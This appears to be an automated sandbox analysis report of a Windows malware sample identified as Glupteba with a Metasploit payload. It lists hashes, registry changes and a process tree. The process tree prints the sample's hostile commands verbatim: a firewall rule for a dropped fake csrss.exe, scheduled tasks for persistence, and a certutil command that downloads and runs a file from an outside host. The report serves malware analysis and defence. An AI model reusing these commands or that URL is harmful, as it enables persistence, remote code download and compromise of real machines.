Analysis
-
max time kernel
152s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
14-07-2022 06:03
Static task
static1
Behavioral task
behavioral1
Sample
479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe
Resource
win10v2004-20220414-en
General
-
Target
479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe
-
Size
3.7MB
-
MD5
8e52e316baff9c06e2e8354c99d6c10d
-
SHA1
8c00dab5d2e609cbe3e5f39146fc1b76234da27a
-
SHA256
479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f
-
SHA512
cf2b6794b46ad9cfe7bf39434c31088521214df84f17b5521878a9fce3ecce9a8cfea31bc3f2ed2b89d7b3957249cf462a98d3b3c0e4921eafc2ec9185b2619c
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba payload 7 IoCs
Processes:
resource yara_rule behavioral2/memory/2272-131-0x0000000001580000-0x0000000001D84000-memory.dmp family_glupteba behavioral2/memory/2272-132-0x0000000000400000-0x0000000000C1D000-memory.dmp family_glupteba behavioral2/memory/2272-134-0x0000000000400000-0x0000000000C1D000-memory.dmp family_glupteba behavioral2/memory/4232-138-0x0000000000400000-0x0000000000C1D000-memory.dmp family_glupteba behavioral2/memory/4232-142-0x0000000000400000-0x0000000000C1D000-memory.dmp family_glupteba behavioral2/memory/3516-144-0x0000000000400000-0x0000000000C1D000-memory.dmp family_glupteba behavioral2/memory/3516-149-0x0000000000400000-0x0000000000C1D000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
svchost.exedescription pid process target process PID 1964 created 2272 1964 svchost.exe 479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe PID 1964 created 3516 1964 svchost.exe csrss.exe PID 1964 created 3516 1964 svchost.exe csrss.exe PID 1964 created 3516 1964 svchost.exe csrss.exe -
Executes dropped EXE 2 IoCs
Processes:
csrss.exepatch.exepid process 3516 csrss.exe 2064 patch.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShyStar = "\"C:\\Windows\\rss\\csrss.exe\"" 479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 1780 bcdedit.exe -
Drops file in Windows directory 2 IoCs
Processes:
479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exedescription ioc process File opened for modification C:\Windows\rss 479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe File created C:\Windows\rss\csrss.exe 479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe -
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 4448 2272 WerFault.exe 479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe 4548 4232 WerFault.exe 479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
csrss.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time" csrss.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.execsrss.exepid process 2272 479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe 2272 479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe 4232 479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe 4232 479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe 3516 csrss.exe 3516 csrss.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
Processes:
479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exesvchost.execsrss.exedescription pid process Token: SeDebugPrivilege 2272 479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe Token: SeImpersonatePrivilege 2272 479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe Token: SeTcbPrivilege 1964 svchost.exe Token: SeTcbPrivilege 1964 svchost.exe Token: SeBackupPrivilege 1964 svchost.exe Token: SeRestorePrivilege 1964 svchost.exe Token: SeBackupPrivilege 1964 svchost.exe Token: SeRestorePrivilege 1964 svchost.exe Token: SeSystemEnvironmentPrivilege 3516 csrss.exe Token: SeBackupPrivilege 1964 svchost.exe Token: SeRestorePrivilege 1964 svchost.exe Token: SeBackupPrivilege 1964 svchost.exe Token: SeRestorePrivilege 1964 svchost.exe Token: SeBackupPrivilege 1964 svchost.exe Token: SeRestorePrivilege 1964 svchost.exe Token: SeBackupPrivilege 1964 svchost.exe Token: SeRestorePrivilege 1964 svchost.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
svchost.exe479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.execmd.execsrss.exedescription pid process target process PID 1964 wrote to memory of 4232 1964 svchost.exe 479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe PID 1964 wrote to memory of 4232 1964 svchost.exe 479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe PID 1964 wrote to memory of 4232 1964 svchost.exe 479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe PID 4232 wrote to memory of 2184 4232 479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe cmd.exe PID 4232 wrote to memory of 2184 4232 479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe cmd.exe PID 2184 wrote to memory of 4128 2184 cmd.exe netsh.exe PID 2184 wrote to memory of 4128 2184 cmd.exe netsh.exe PID 4232 wrote to memory of 3516 4232 479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe csrss.exe PID 4232 wrote to memory of 3516 4232 479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe csrss.exe PID 4232 wrote to memory of 3516 4232 479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe csrss.exe PID 1964 wrote to memory of 4996 1964 svchost.exe schtasks.exe PID 1964 wrote to memory of 4996 1964 svchost.exe schtasks.exe PID 1964 wrote to memory of 536 1964 svchost.exe schtasks.exe PID 1964 wrote to memory of 536 1964 svchost.exe schtasks.exe PID 1964 wrote to memory of 2064 1964 svchost.exe patch.exe PID 1964 wrote to memory of 2064 1964 svchost.exe patch.exe PID 3516 wrote to memory of 1780 3516 csrss.exe bcdedit.exe PID 3516 wrote to memory of 1780 3516 csrss.exe bcdedit.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe"C:\Users\Admin\AppData\Local\Temp\479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2272 -
C:\Users\Admin\AppData\Local\Temp\479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe"C:\Users\Admin\AppData\Local\Temp\479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe"2⤵
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4232 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:4128 -
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
PID:4996 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
PID:536 -
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
- Executes dropped EXE
PID:2064 -
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
PID:1780 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 7763⤵
- Program crash
PID:4548 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 7002⤵
- Program crash
PID:4448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1964
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2272 -ip 22721⤵PID:4432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 4232 -ip 42321⤵PID:1284
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD513aaafe14eb60d6a718230e82c671d57
SHA1e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
Filesize
3.7MB
MD58e52e316baff9c06e2e8354c99d6c10d
SHA18c00dab5d2e609cbe3e5f39146fc1b76234da27a
SHA256479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f
SHA512cf2b6794b46ad9cfe7bf39434c31088521214df84f17b5521878a9fce3ecce9a8cfea31bc3f2ed2b89d7b3957249cf462a98d3b3c0e4921eafc2ec9185b2619c
-
Filesize
3.7MB
MD58e52e316baff9c06e2e8354c99d6c10d
SHA18c00dab5d2e609cbe3e5f39146fc1b76234da27a
SHA256479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f
SHA512cf2b6794b46ad9cfe7bf39434c31088521214df84f17b5521878a9fce3ecce9a8cfea31bc3f2ed2b89d7b3957249cf462a98d3b3c0e4921eafc2ec9185b2619c